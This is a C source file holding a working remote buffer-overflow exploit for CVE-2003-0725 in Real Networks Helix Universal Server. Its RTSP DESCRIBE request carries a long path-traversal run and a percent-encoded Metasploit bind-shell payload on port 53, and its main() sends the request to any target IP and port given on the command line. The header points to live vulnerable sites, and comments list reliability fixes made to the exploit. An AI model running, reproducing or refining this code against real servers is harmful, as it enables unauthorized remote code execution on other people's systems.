/******************************************************************************/
Real Networks Helix Universal Server Vsrc3260.dll Remote Buffer Overflow Vulnerability Exploit
by cocoruder(frankruder_at_hotmail.com),2007.04.27
[url]http://ruder.cdut.net[/url]
References:
[url]http://www.securityfocus.com/bid/8476/[/url]
[url]http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0725[/url]
A very old but still interesting vulnerability;
Notice that there are still many movie sites in China using the affected versions...
Tested successfully on Real Networks Helix Universal Server 9.0.2.794 + Windows 2000 SP4, enjoy it :)
******************************************************************************/
/* The header names were stripped from this paste; these are what the code
 * below needs (Winsock 2 for WSAStartup/socket/send/recv -- link ws2_32.lib,
 * stdio for printf, stdlib for the port parsing, string for memset). */
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * The complete RTSP request sent by main(), as one C string:
 *
 *   "DESCRIBE " + a long run of "../" path segments + "%20%20" + "AAAA"
 *   + the shellcode + "aa2.rm RTSP/1.0" CRLF CRLF
 *
 * Everything between "DESCRIBE " and " RTSP/1.0" is the request URL.  Note
 * that the shellcode is written as percent-encoded TEXT ("%eb%03..."), not as
 * \x escapes: the bytes that actually go on the wire are the ASCII characters
 * '%', 'e', 'b', ...  Presumably the vulnerable server URL-decodes the request
 * path before the overflowing copy, which is what turns this text back into
 * machine code -- that decoding step is not visible here, confirm against the
 * advisory before relying on it.  Only the final "\x0D\x0A" sequences are real
 * control bytes.
 *
 * Per the Metasploit banner below the payload is a win32 bind shell listening
 * on TCP port 53 of the target (EXITFUNC=thread); nothing in this file
 * connects to that port afterwards.
 *
 * The literal carries a trailing NUL which main() deliberately excludes via
 * sizeof(...) - 1.
 */
unsigned char buff_exploit_bind_port53[]=
"DESCRIBE "
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../"
"%20%20" // two URL-encoded spaces (author's original note: "valid code")
"AAAA"   // 4-byte filler between the encoded spaces and the shellcode
/* win32_bind - EXITFUNC=thread LPORT=53 Size=696 Encoder=Alpha2 http://metasploit.com */
/* NOTE: the bytes below are percent-encoded text, see the block comment above. */
"%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%48%49%49%49%49"
"%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%46"
"%58%50%30%42%31%42%41%6b%42%41%56%42%32%42%41%32"
"%41%41%30%41%41%58%50%38%42%42%75%7a%49%4b%4c%42"
"%4a%58%6b%52%6d%39%78%6b%49%6b%4f%39%6f%69%6f%31"
"%70%6e%6b%30%6c%74%64%77%54%6e%6b%42%65%47%4c%6c"
"%4b%31%6c%54%45%32%58%36%61%4a%4f%4c%4b%30%4f%55"
"%48%4e%6b%41%4f%57%50%67%71%5a%4b%30%49%6e%6b%76"
"%54%4c%4b%73%31%58%6e%65%61%4f%30%4d%49%4e%4c%4f"
"%74%6b%70%63%44%57%77%6b%71%59%5a%56%6d%74%41%6b"
"%72%6a%4b%4a%54%67%4b%66%34%35%74%66%48%73%45%38"
"%65%6e%6b%63%6f%31%34%47%71%6a%4b%71%76%6e%6b%66"
"%6c%70%4b%6e%6b%51%4f%55%4c%54%41%58%6b%47%73%76"
"%4c%6e%6b%4c%49%52%4c%41%34%37%6c%31%71%79%53%65"
"%61%39%4b%75%34%4e%6b%61%53%64%70%6e%6b%73%70%56"
"%6c%4c%4b%32%50%77%6c%6e%4d%6e%6b%33%70%76%68%33"
"%6e%43%58%6c%4e%30%4e%44%4e%7a%4c%70%50%6b%4f%5a"
"%76%35%36%50%53%55%36%52%48%70%33%37%42%33%58%52"
"%57%54%33%34%72%31%4f%33%64%69%6f%4e%30%72%48%4a"
"%6b%5a%4d%4b%4c%37%4b%52%70%6b%4f%6a%76%61%4f%6b"
"%39%4b%55%50%66%6e%61%58%6d%36%68%33%32%62%75%43"
"%5a%37%72%49%6f%6e%30%72%48%5a%79%63%39%4b%45%4c"
"%6d%33%67%49%6f%4a%76%53%63%63%63%73%63%76%33%71"
"%43%52%63%70%53%31%53%32%73%6b%4f%48%50%70%66%42"
"%48%73%30%67%45%71%76%56%33%6c%49%4d%31%4e%75%32"
"%48%69%34%35%4a%32%50%58%47%36%37%4b%4f%6b%66%63"
"%5a%72%30%31%41%62%75%6b%4f%78%50%70%68%6e%44%6c"
"%6d%64%6e%5a%49%51%47%6b%4f%4b%66%72%73%66%35%4b"
"%4f%4e%30%62%48%48%65%52%69%6b%36%73%79%52%77%49"
"%6f%6e%36%32%70%31%44%72%74%52%75%49%6f%68%50%7a"
"%33%45%38%79%77%31%69%4f%36%33%49%72%77%6b%4f%6e"
"%36%70%55%59%6f%7a%70%75%36%31%7a%41%74%70%66%41"
"%78%30%63%30%6d%6c%49%79%75%73%5a%32%70%70%59%74"
"%69%4a%6c%4f%79%6d%37%73%5a%31%54%6c%49%38%62%47"
"%41%59%50%6a%53%4c%6a%39%6e%71%52%44%6d%59%6e%42"
"%62%36%4c%4f%63%4c%4d%70%7a%45%68%4e%4b%6e%4b%6e"
"%4b%52%48%41%62%79%6e%4d%63%36%76%39%6f%62%55%32"
"%64%79%6f%4e%36%61%4b%33%67%43%62%61%41%52%71%76"
"%31%32%4a%77%71%62%71%56%31%70%55%70%51%69%6f%5a"
"%70%31%78%6e%4d%69%49%77%75%6a%6e%36%33%6b%4f%4e"
"%36%43%5a%4b%4f%59%6f%30%37%79%6f%4e%30%6c%4b%56"
"%37%6b%4c%4e%63%6b%74%61%74%4b%4f%4a%76%42%72%79"
"%6f%4e%30%43%58%68%6f%48%4e%4b%50%33%50%51%43%59"
"%6f%5a%76%79%6f%38%50%46"
/* rest of the URL (a .rm file name), the RTSP version, then CRLF CRLF ends the request */
"aa2.rm RTSP/1.0\x0D\x0A"
"\x0D\x0A";
/* Scratch buffer for whatever the server answers after the DESCRIBE.
 * main() zeroes it and reads into it once; the contents are never inspected. */
unsigned char recvbuff[4000];
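/*
 * Entry point:  <program> <target ip> <rtsp port>
 *
 * Opens one TCP connection to the target, sends the RTSP DESCRIBE request held
 * in buff_exploit_bind_port53 (without the string's trailing NUL), reads a
 * single reply into recvbuff and exits.  The payload's Metasploit banner says
 * the shellcode binds a shell on TCP port 53 of the target; nothing here
 * connects to it, that is up to the operator.
 *
 * Fixes over the original: argv is validated before use (no NULL dereference
 * when arguments are missing), the port is range-checked instead of atoi()'d,
 * WSAStartup()/inet_addr()/recv() results are checked, socket() failure is
 * detected with INVALID_SOCKET (SOCKET is unsigned on Win32, so the old
 * `sock <= 0` test could never fire), send() is looped for short writes, and
 * every exit path releases the socket and Winsock.
 *
 * Returns 0 on success, 1 on a usage or network error.  Windows only;
 * link with ws2_32.lib.
 */
int main(int argc, char **argv)
{
    WSADATA ws;
    SOCKET sock;
    struct sockaddr_in server;
    long port;
    char *end;
    int total, sent, n;
    int rc = 1;

    if (argc < 3) {
        printf("usage: %s <target ip> <rtsp port>\n", argc > 0 ? argv[0] : "exploit");
        return 1;
    }

    /* atoi() turns garbage into port 0 silently; parse and range-check. */
    port = strtol(argv[2], &end, 10);
    if (argv[2][0] == '\0' || *end != '\0' || port < 1 || port > 65535) {
        printf("invalid port: %s\n", argv[2]);
        return 1;
    }

    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0) {
        printf("WSAStartup error!\n");
        return 1;
    }

    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_port = htons((USHORT)port);
    server.sin_addr.s_addr = inet_addr(argv[1]);
    if (server.sin_addr.s_addr == INADDR_NONE) {
        printf("invalid address: %s\n", argv[1]);
        goto cleanup_wsa;
    }

    /* socket() reports failure as INVALID_SOCKET (~0), never as a negative value. */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET) {
        printf("socket error! (%d)\n", WSAGetLastError());
        goto cleanup_wsa;
    }

    if (connect(sock, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR) {
        printf("connect error (%d)\n", WSAGetLastError());
        goto cleanup_sock;
    }

    printf("sending exploit packet...\n");

    /* send() may accept fewer bytes than asked for; keep going until the whole
     * request -- minus the literal's terminating NUL -- is on the wire. */
    total = (int)(sizeof(buff_exploit_bind_port53) - 1);
    for (sent = 0; sent < total; sent += n) {
        n = send(sock, (const char *)buff_exploit_bind_port53 + sent, total - sent, 0);
        if (n <= 0) {   /* SOCKET_ERROR, or a zero-length write we must not spin on */
            printf("send error! (%d)\n", WSAGetLastError());
            goto cleanup_sock;
        }
    }

    /* Read one reply (or EOF) before closing; the original did this too,
     * presumably to keep the connection open until the server has processed
     * the request.  The reply itself is not examined. */
    memset(recvbuff, 0, sizeof(recvbuff));
    n = recv(sock, (char *)recvbuff, sizeof(recvbuff), 0);
    if (n == SOCKET_ERROR) {
        printf("recv error (%d)\n", WSAGetLastError());
        goto cleanup_sock;
    }
    rc = 0;

cleanup_sock:
    closesocket(sock);
cleanup_wsa:
    WSACleanup();
    return rc;
}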